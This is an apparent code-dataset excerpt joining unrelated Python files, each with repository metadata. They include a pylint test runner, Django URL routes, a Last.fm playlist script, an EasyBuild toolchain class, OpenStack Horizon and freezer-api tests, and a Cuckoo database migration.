'pkg': self.package, 'cls': self.__class__.__name__} if self.package == self.DEFAULT_PACKAGE: msg = '%(mode)s test of input file "%(input)s" (%(cls)s)' else: msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)' return msg % values def test_functionality(self): tocheck = [self.package+'.'+self.module] if self.depends: tocheck += [self.package+'.%s' % name.replace('.py', '') for name, file in self.depends] self._test(tocheck) def _test(self, tocheck): if INFO_TEST_RGX.match(self.module): self.linter.enable_message_category('I') else: self.linter.disable_message_category('I') try: self.linter.check(tocheck) except Exception, ex: # need finalization to restore a correct sta
te self.linter.reporter.finalize() ex.file = tocheck ex.__str__ = new.instancemethod(exception_str, ex, None) raise if self.module.startswith('func_noerror_'): expected = '' else: output = open(self.output) expected = output.read().strip() output.close() got = self.linter.reporter.finalize().strip() try: self.assertLinesEquals(g
ot, expected) except Exception, ex: # doesn't work with py 2.5 #ex.file = tocheck #ex.__str__ = new.instancemethod(exception_str, ex, None) raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1] class LintTestUsingFile(LintTestUsingModule): _TEST_TYPE = 'file' def test_functionality(self): tocheck = [self.package+'/' + self.module + '.py'] if self.depends: tocheck += [self.package+'/%s' % name for name, file in self.depends] self._test(tocheck) class TestTests(testlib.TestCase): """check that all testable messages have been checked""" @testlib.tag('coverage') def test_exhaustivity(self): # skip fatal messages todo = [msgid for msgid in linter._messages.keys() if msgid[0] != 'F'] for msgid in test_reporter.message_ids.keys(): try: todo.remove(msgid) except ValueError: continue todo.sort() if PY25: self.assertEqual(todo, ['E0503', 'I0001']) elif PY23: self.assertEqual(todo, ['E0503', 'I0001']) else: # python < 2.3 self.assertEqual(todo, ['I0001']) #bycat = {} #for msgid in linter._messages.keys(): # bycat[msgid[0]] = bycat.setdefault(msgid[0], 0) + 1 #for cat, val in bycat.items(): # print '%s: %s' % (cat, val) #print 'total', sum(bycat.values()) # # on 2007/02/17: # # W: 48 # E: 42 # R: 15 # C: 13 # F: 7 # I: 5 # total 130 def make_tests(filter_rgx): """generate tests classes from test info return the list of generated test classes """ if filter_rgx: is_to_run = re.compile(filter_rgx).search else: is_to_run = lambda x: 1 tests = [] for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]: # skip those tests with python >= 2.3 since py2.3 detects them by itself if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"): continue pyrestr = module_file.rsplit('_py', 1)[-1][:-3] if pyrestr.isdigit(): # '24', '25'... if sys.version_info < tuple([int(i) for i in pyrestr]): continue if not is_to_run(module_file): continue base = module_file.replace('func_', '').replace('.py', '') dependencies = get_tests_info(base, '.py') class LintTestUsingModuleTC(LintTestUsingModule): module = module_file.replace('.py', '') output = messages_file depends = dependencies or None tags = testlib.Tags(('generated','pylint_input_%s' % module)) tests.append(LintTestUsingModuleTC) if MODULES_ONLY: continue class LintTestUsingFileTC(LintTestUsingFile): module = module_file.replace('.py', '') output = exists(messages_file + '2') and (messages_file + '2') or messages_file depends = dependencies or None tags = testlib.Tags(('generated', 'pylint_input_%s' % module)) tests.append(LintTestUsingFileTC) ## # special test for f0003 ## module_file, messages_file in get_tests_info('func_f0003', '.pyc') ## class LintTestSubclass(LintTest): ## module = module_file.replace('.pyc', '') ## output = messages_file ## depends = dependencies or None ## tests.append(LintTestSubclass) class LintBuiltinModuleTest(LintTestUsingModule): output = 'messages/builtin_module.txt' module = 'sys' def test_functionality(self): self._test(['sys']) tests.append(LintBuiltinModuleTest) if not filter_rgx: # test all features are tested :) tests.append(TestTests) return tests FILTER_RGX = None MODULES_ONLY = False def suite(): return unittest.TestSuite([unittest.makeSuite(test) for test in make_tests(FILTER_RGX)]) if __name__=='__main__': if '-m' in sys.argv: MODULES_ONLY = True sys.argv.remove('-m') if len(sys.argv) > 1: FILTER_RGX = sys.argv[1] del sys.argv[1] testlib.unittest_main(defaultTest='suite')
rh-lab-q/conflab
wsgi/openshift/confla/urls.py
Python
gpl-3.0
6,136
0.008638
from django.conf.urls import url, include from django.conf.urls.static import static from django.conf import settings from django.contrib import admin from django.urls import path from confla import views app_name = "confla" urlpatterns = [ path('admin/', admin.site.urls), url(r'^$', views.IndexView.my_view, name='index'), url(r'add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'), url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'), url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'), url(r'^login/$', views.LoginView.my_view, name='login'), url(r'^logout/$', views.LoginView.logout, name='logout'), url(r'^process/$', views.LoginView.auth_and_login, name='process_login'), url(r'^users/$', views.UserView.my_view, name='users'), url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'), url(r'^
user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_ema
il, name='delete_email'), url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'), url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'), url(r'^register/$', views.RegisterView.user_register, name='register'), url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'), url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'), #url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'), #url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'), url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'), url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'), url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'), url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'), url(r'^(?P<url_id>\w+)/events/$', views.EventView.event_list, name='event_list'), url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'), url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'), url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'), url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'), url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'), url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'), url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'), url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'), url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'), url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'), url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'), url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'), url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'), url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'), url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'), url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'), url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'), url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'), url(r'^org/admin/users/$', views.AdminView.users, name='org_users'), url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'), url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'), url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'), url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'), url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'), url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'), url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'), url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'), url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'), url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'), url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'), url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'), url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'), url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'), url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'), url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'), url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'), url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'), url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'), url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',views.RegisterView.activate_email , name='activate_email'), ] urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
anselmobd/fo2
src/itat/views/views.py
Python
mit
131
0
from pprint import pprint from django.shor
tcuts import render def index(request): return render(requ
est, 'itat/index.html')
pdevetto/misc
lastfm/playlist.py
Python
gpl-3.0
7,352
0.010473
# -*- coding: utf-8 -*- import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp import Levenshtein config = ConfigParser.ConfigParser() config.read("config.ini") def clean(chaine): #print chaine return chaine.lower().strip() def decode(chaine): chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'") try: chaine = unicodedata.normalize('NFKD', chaine).encode('ascii','ignore') return chaine except: return chaine def remove_accents(input_str): try: nkfd_form = unicodedata.normalize('NFKD', unicode(input_str)) return u"".join([c for c in nkfd_form if not unicodedata.combining(c)]) except: return input_str def cc(i): return decode(clean(remove_accents(i))) def getKey(item): return item[0] class playlist: def __init__(self, limit, page=1, period="overall"): self.api_key = config.get("lastfm"
,'key') self.music_dir = config.get("lastfm",'directory') self.page = page self.mp_dir = config.get("lastfm",'mudir') self.user = conf
ig.get("lastfm",'user') self.dossier = os.listdir(self.music_dir) self.period = period self.limit = limit self.notfound = [] #for i in req! def lastfm(self, meth): try: url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page) txt = urllib2.urlopen(url).read() return json.loads(txt) except urllib2.HTTPError: #print '\n Error : '+art return None def toptracks(self): url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period; req = self.lastfm(url) for i in req["toptracks"]["track"]: #if cc(i['artist']['name']) == "high tone": yield {'name':i['name'],'artist':cc(i['artist']['name'])} """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2""" def findartist(self, artist): textlog = " find (" + artist + "):\n" lev = {} # Chaque artiste dans le dossier for art in self.dossier: ar = cc(art) # Correspondance exacte (pas de majuscule, pas d'accents, pas d'expace) if ar == artist: ##print "YES BITCH" return art # Distance de levenshtein: on stocke si pas trop de difference elif abs(len(ar) - len(artist)) < 5: l = Levenshtein.distance(ar, artist) if l < (len(art)/2): if not l in lev.keys(): lev[l] = [] lev[l].append(art) # On process textlog += str(lev) + "\n" if lev != {} and len( lev[min(lev.keys())] ) == 1: ##print lev[min(lev.keys())][0] ##print "YES BIS BITCHY BITCH" return lev[min(lev.keys())][0] else: pass ##print textlog """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2""" def findtrack(self, artist, track, i=0, lev=False): # Chaque truc dans le dossier base = self.music_dir + "/" + artist for fil in os.listdir(base): if os.path.isdir(base +"/"+ fil): ##print ("findtrack " + artist + " / " + fil + " - " + track) try: for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev): yield result except UnicodeDecodeError: pass if os.path.isfile(base +"/"+ fil): if lev: nfil = cc(clean(unicode(fil[:-4],'utf-8'))) ntr = cc(clean(track)) l = Levenshtein.distance(ntr, nfil) if l < len(ntr): ##print "lev |" + ntr + "|" + nfil + "|" ##print str(l) + " - " + str(len(cc(track))) yield [l, base+"/"+fil] else: if clean(track) in clean(unicode(fil,'utf-8')): ##print base+"/"+fil yield base+"/"+fil def mkdirs(self, li, pat): if li != []: dd = os.path.join(pat, li[0]) if not os.path.isdir( dd ): ##print "mkdir(" + dd+")" os.mkdir(dd) return self.mkdirs(li[1:], dd) else: return pat def move(self, t): dirs = t[len(self.music_dir)+1:].split("/") new = self.mkdirs(dirs[:-1], self.mp_dir) dst = os.path.join(new, dirs[-1]) if os.path.isfile( dst ): if os.path.getsize(t) != os.path.getsize(dst): os.remove(dst) else: return 1 shutil.copyfile(t, dst) ##print "exist" #shutil.copyfile(t, dst) def findtrackall(self, a, i): for t in self.findtrack(a, i['name']): return t ##print "### :: " + i['artist'] + '-' + i['name'] + "" ties = [] for t in self.findtrack(a, i['name'], lev=True): ties.append(t) if len(ties) == 0: return 0 if len(ties) == 1: ##print ties[0][1] return ties[0][1] else: ties = sorted(ties, key=getKey) ##print ties[0][1] return ties[0][1] def run(self): file = time.strftime("TOP"+self.limit+"_%m%d%H%M.m3u") fo = open(file, 'w+') number = 0 for i in self.toptracks(): number += 1 print number #for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]: a = self.findartist(i['artist']) t = 0 if a: t = self.findtrackall(a, i) if t == 0: t = self.findtrackall("Various Artists", i) ##print t if t != 0: fo.write(t+"\n") if os.path.isdir( self.mp_dir ): self.move(t) else: #print "###########" #print i['artist'] + '-' + i['name'] pass #print self.notfound #print '--finished--' fo.close() # <?xml version="1.0" encoding="UTF-8"?> # <playlist version="1" xmlns="http://xspf.org/ns/0/"> # <trackList> # <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track> # <track><location>file:///media/data/Musique/The Black Keys/Attack &amp; Release/The Black Keys - Psychotic Girl.mp3</location></track> # <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track> # </trackList> # </playlist> pass if len(sys.argv) == 0 : print "usage : python playlist.py length page" else: if len(sys.argv) <= 1 : p = playlist(100) elif len(sys.argv) <= 2 : p = playlist(sys.argv[1]) elif len(sys.argv) <= 3 : p = playlist(sys.argv[1], sys.argv[2]) else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3]) p.run()
hpcugent/easybuild-framework
easybuild/toolchains/gomkl.py
Python
gpl-2.0
1,727
0.001737
## # Copyright 2012-2021 Ghent University # # This file is part of EasyBuild, # originally created by
the HPC team of Ghent University (ht
tp://ugent.be/hpc/en), # with support of Ghent University (http://ugent.be/hpc), # the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be), # Flemish Research Foundation (FWO) (http://www.fwo.be/en) # and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en). # # https://github.com/easybuilders/easybuild # # EasyBuild is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation v2. # # EasyBuild is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EasyBuild. If not, see <http://www.gnu.org/licenses/>. ## """ EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers). :author: Stijn De Weirdt (Ghent University) :author: Kenneth Hoste (Ghent University) :author: Ake Sandgren (Umea University) """ from easybuild.toolchains.gompi import Gompi from easybuild.toolchains.gmkl import Gmkl from easybuild.toolchains.fft.intelfftw import IntelFFTW from easybuild.toolchains.linalg.intelmkl import IntelMKL class Gomkl(Gompi, IntelMKL, IntelFFTW): """Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers.""" NAME = 'gomkl' SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
trendels/rhino
examples/content_type_versioning.py
Python
mit
1,165
0.004292
import json from rhino import Mapper, get # Our internal representation report = { 'title': 'foo', 'author': 'Fred', 'date': '2015-01-09', 'tags': ['a', 'b', 'c'], } # Base class for our representations class report_repr(object
): @classmethod def serialize(cls, report): obj = dict([(k, report[k]) for k in cls.fields]) return json.dumps(obj, sort_keys=True) # Different versions of the representation class report_v1(report_repr): provides = 'application/vnd.acme.report+json;v=1' fields = ['title', 'author'] class report_v2(report_repr): provides = 'application/vnd.acme.report+json;v=2' fields
= ['title', 'author', 'date'] class report_v3(report_repr): provides = 'application/vnd.acme.report+json;v=3' fields = ['title', 'author', 'date', 'tags'] # One handler can handle multiple representations. # Here, report_v3 is the default when the client doesn't specify a preference. @get(produces=report_v1) @get(produces=report_v2) @get(produces=report_v3) def get_report(request): return report app = Mapper() app.add('/', get_report) if __name__ == '__main__': app.start_server()
NeCTAR-RC/horizon
openstack_dashboard/dashboards/admin/defaults/tests.py
Python
apache-2.0
6,926
0
# Copyright 2013 Kylin, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django.urls import reverse import mock from openstack_dashboard import api from openstack_dashboard.test import helpers as test from openstack_dashboard.usage import quotas INDEX_URL = reverse('horizon:admin:defaults:index') class ServicesViewTests(test.BaseAdminViewTests): @test.create_mocks({ api.nova: [('default_quota_get', 'nova_default_quota_get')], api.cinder: [('default_quota_get', 'cinder_default_quota_get'), 'is_volume_service_enabled'], api.base: ['is_service_enabled'], api.neutron: [('default_quota_get', 'neutron_default_quota_get')], quotas: ['enabled_quotas']}) def test_index(self): # Neutron does not have an API for getting default system # quotas. When not using Neutron, the floating ips quotas # should be in the list. self.mock_is_volume_service_enabled.return_value = True self.mock_is_service_enabled.return_value = True compute_quotas = [q.name for q in self.quotas.nova] self.mock_enabled_quotas.return_value = compute_quotas self.mock_nova_default_quota_get.return_value = self.quotas.nova self.mock_cinder_default_quota_get.return_value = \ self.cinder_quotas.first() self.mock_neutron_default_quota_get.return_value = \ self.neutron_quotas.first() res = self.client.get(INDEX_URL) self.assertTemplateUsed(res, 'admin/defaults/index.html') expected_data = [ '<Quota: (injected_file_content_bytes, 1)>', '<Quota: (metadata_items, 1)>', '<Quota: (injected_files, 1)>', '<Quota: (ram, 10000)>', '<Quota: (instances, 10)>', '<Quota: (cores, 10)>', '<Quota: (key_pairs, 100)>', '<Quota: (server_groups, 10)>', '<Quota: (server_group_members, 10)>', '<Quota: (injected_file_path_bytes, 255)>', ] self._check_quotas_data(res, 'compute_quotas', expected_data) expected_data = [ '<Quota: (gigabytes, 1000)>', '<Quota: (snapshots, 1)>', '<Quota: (volumes, 1)>', ] self._check_quotas_data(res, 'volume_quotas', expected_data) expected_data = [ '<Quota: (network, 10)>', '<Quota: (subnet, 10)>', '<Quota: (port, 50)>', '<Quota: (router, 10)>', '<Quota: (floatingip, 50)>', '<Quota: (security_group, 20)>', '<Quota: (security_group_rule, 100)>', ] self._check_quotas_data(res, 'network_quotas', expected_data) self.mock_is_volume_service_enabled.assert_called_once_with(
test.IsHttpRequest()) self.assertEqual(2, self.mock_is_service_enabled.call_count) self.mock_is_service_enabled.assert_has_calls([ mock.call(test.IsHttpRequest(), 'compute'), mock.call(test.IsHttpRequest(), 'network')]) self.assert_mock_multiple_calls_with_same_arguments(
self.mock_enabled_quotas, 4, mock.call(test.IsHttpRequest())) self.mock_nova_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.tenant.id) self.mock_cinder_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.tenant.id) self.mock_neutron_default_quota_get.assert_called_once_with( test.IsHttpRequest()) def _check_quotas_data(self, res, slug, expected_data): quotas_tab = res.context['tab_group'].get_tab(slug) self.assertQuerysetEqual(quotas_tab._tables[slug].data, expected_data, ordered=False) class UpdateDefaultQuotasTests(test.BaseAdminViewTests): def _get_quota_info(self, quota): quota_data = {} updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS | quotas.CINDER_QUOTA_FIELDS) for field in updatable_quota_fields: if field != 'fixed_ips': limit = quota.get(field).limit or 10 quota_data[field] = int(limit) return quota_data @test.create_mocks({ api.nova: [('default_quota_update', 'nova_default_quota_update'), ('default_quota_get', 'nova_default_quota_get')], api.cinder: [('default_quota_update', 'cinder_default_quota_update'), ('default_quota_get', 'cinder_default_quota_get')], quotas: ['get_disabled_quotas']}) def test_update_default_quotas(self): quota = self.quotas.first() + self.cinder_quotas.first() self.mock_get_disabled_quotas.return_value = set() self.mock_nova_default_quota_get.return_value = self.quotas.first() self.mock_nova_default_quota_update.return_value = None self.mock_cinder_default_quota_get.return_value = \ self.cinder_quotas.first() self.mock_cinder_default_quota_update.return_value = None # update some fields quota[0].limit = 123 quota[1].limit = -1 updated_quota = self._get_quota_info(quota) url = reverse('horizon:admin:defaults:update_defaults') res = self.client.post(url, updated_quota) self.assertNoFormErrors(res) self.assertRedirectsNoFollow(res, INDEX_URL) self.mock_get_disabled_quotas.assert_called_once_with( test.IsHttpRequest()) nova_fields = quotas.NOVA_QUOTA_FIELDS nova_updated_quota = dict((key, updated_quota[key]) for key in nova_fields if key != 'fixed_ips') self.mock_nova_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.request.user.tenant_id) self.mock_nova_default_quota_update.assert_called_once_with( test.IsHttpRequest(), **nova_updated_quota) cinder_updated_quota = dict((key, updated_quota[key]) for key in quotas.CINDER_QUOTA_FIELDS) self.mock_cinder_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.request.user.tenant_id) self.mock_cinder_default_quota_update.assert_called_once_with( test.IsHttpRequest(), **cinder_updated_quota)
cuckoobox/cuckoo
cuckoo/private/db_migration/versions/from_1_1_to_1_2-added_states.py
Python
mit
7,228
0.004289
# Copyright (C) 2010-2013 Claudio Guarnieri. # Copyright (C) 2014-2016 Cuckoo Foundation. # This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org # See the file 'docs/LICENSE' for copying permission. """Added failed statuses to tasks (from Cuckoo 1.1 to 1.2) Revision ID: 495d5a6edef3 Revises: 18eee46c6f81 Create Date: 2015-02-28 19:08:29.284111 """ # Spaghetti as a way of life. # Revision identifiers, used by Alembic. revision = "495d5a6edef3" down_revision = "18eee46c6f81" import sqlalchemy as sa from datetime import datetime from alembic import op from dateutil.parser import parse import cuckoo.core.database as db def upgrade(): conn = op.get_bind() # Deal with Alembic shit. # Alembic is so ORMish that it was impossible to write code which works on different DBMS. if conn.engine.driver == "psycopg2": # Altering status ENUM. # This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type. # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction. op.execute('COMMIT') conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'") else: # Read data. tasks_data = [] old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall() for item in old_tasks: d = {} d["id"] = item[0] d["target"] = item[1] d["category"] = item[2] d["timeout"] = item[3] d["priority"] = item[4] d["custom"] = item[5] d["machine"] = item[6] d["package"] = item[7] d["options"] = item[8] d["platform"] = item[9] d["memory"] = item[10] d["enforce_timeout"] = item[11] if isinstance(item[12], datetime): d["clock"] = item[12] elif item[12]: d["clock"] = parse(item[12]) else: d["clock"] = None if isinstance(item[13], datetime): d["added_on"] = item[13] elif item[13]: d["added_on"] = parse(item[13]) else: d["added_on"] = None if isinstance(item[14], datetime): d["started_on"] = item[14] elif item[14]: d["started_on"] = parse(item[14]) else: d["started_on"] = None if isinstance(item[15], datetime): d["completed_on"] = item[15] elif item[15]: d["completed_on"] = parse(item[15]) else: d["completed_on"] = None d["status"] = item[16] d["sample_id"] = item[17] tasks_data.append(d) if conn.engine.driver == "mysqldb": # Disable foreign key checking to migrate table avoiding checks. op.execute('SET foreign_key_checks = 0') # Drop old table. op.drop_table("tasks") # Drop old Enum. sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False) # Create table with 1.2 schema. op.create_table( "tasks", sa.Column("id", sa.Integer(), nullable=False), sa.Column("target", sa.String(length=255), nullable=False), sa.Column("category", sa.String(length=255), nullable=False), sa.Column("timeout", sa.Integer(), server_default="0", nullable=False), sa.Column("priority", sa.Integer(), server_default="1", nullable=False), sa.Column("custom", sa.String(length=255), nullable=True), sa.Column("machine", sa.String(length=255), nullable=True), sa.Column("package", sa.String(length=255), nullable=True), sa.Column("options", sa.String(length=255), nullable=True), sa.Column("platform", sa.String(length=255), nullable=True), sa.Column("memory", sa.Boolean(), nullable=False, default=False), sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False), sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False), sa.Column("added_on", sa.DateTime(timezone=False), nullable=False), sa.Colum
n("started_on"
, sa.DateTime(timezone=False), nullable=True), sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True), sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False), sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True), sa.PrimaryKeyConstraint("id") ) op.execute('COMMIT') # Insert data. op.bulk_insert(db.Task.__table__, tasks_data) # Enable foreign key. op.execute('SET foreign_key_checks = 1') else: op.drop_table("tasks") # Create table with 1.2 schema. op.create_table( "tasks", sa.Column("id", sa.Integer(), nullable=False), sa.Column("target", sa.String(length=255), nullable=False), sa.Column("category", sa.String(length=255), nullable=False), sa.Column("timeout", sa.Integer(), server_default="0", nullable=False), sa.Column("priority", sa.Integer(), server_default="1", nullable=False), sa.Column("custom", sa.String(length=255), nullable=True), sa.Column("machine", sa.String(length=255), nullable=True), sa.Column("package", sa.String(length=255), nullable=True), sa.Column("options", sa.String(length=255), nullable=True), sa.Column("platform", sa.String(length=255), nullable=True), sa.Column("memory", sa.Boolean(), nullable=False, default=False), sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False), sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False), sa.Column("added_on", sa.DateTime(timezone=False), nullable=False), sa.Column("started_on", sa.DateTime(timezone=False), nullable=True), sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True), sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False), sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True), sa.PrimaryKeyConstraint("id") ) # Insert data. op.bulk_insert(db.Task.__table__, tasks_data) def downgrade(): pass
openstack/freezer-api
freezer_api/tests/unit/sqlalchemy/v2/test_action.py
Python
apache-2.0
19,604
0
# (c) Copyright 2018 ZTE Corporation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for manipulating Action via the DB API""" import copy from unittest import mock from unittest.mock import patch from freezer_api.common import exceptions as freezer_api_exc from freezer_api.tests.unit import common from freezer_api.tests.unit.sqlalchemy import base class DbActionTestCase(base.DbTestCase): def setUp(self): super(DbActionTestCase, self).setUp() self.fake_action_0 = common.get_fake_action_0() self.fake_action_2 = common.get_fake_action_2() self.fake_action_3 = common.get_fake_action_3() self.freezer_action_0 = self.fake_action_0.get('freezer_action') self.freezer_action_2 = self.fake_action_2.get('freezer_action') self.fake_project_id = self.fake_action_0.get('project_id') self.fake_user_id = self.fake_action_0.get('user_id') self.fake_action_id = common.get_fake_action_id() def test_add_and_get_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result.get('max_retries'), self.fake_action_0.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_0.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_0.get('action')) self.assertEqual(freezer_action.get('backup_name'), self.freezer_action_0.get('backup_name')) self.assertEqual(freezer_action.get('container'), self.freezer_action_0.get('container')) self.assertEqual(freezer_action.get('path_to_backup'), self.freezer_action_0.get('path_to_backup')) self.assertEqual(freezer_action.get('mode'), self.freezer_action_0.get('mode')) def test_add_and_delete_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) result = self.dbapi.delete_action(project_id=self.fake_project_id, 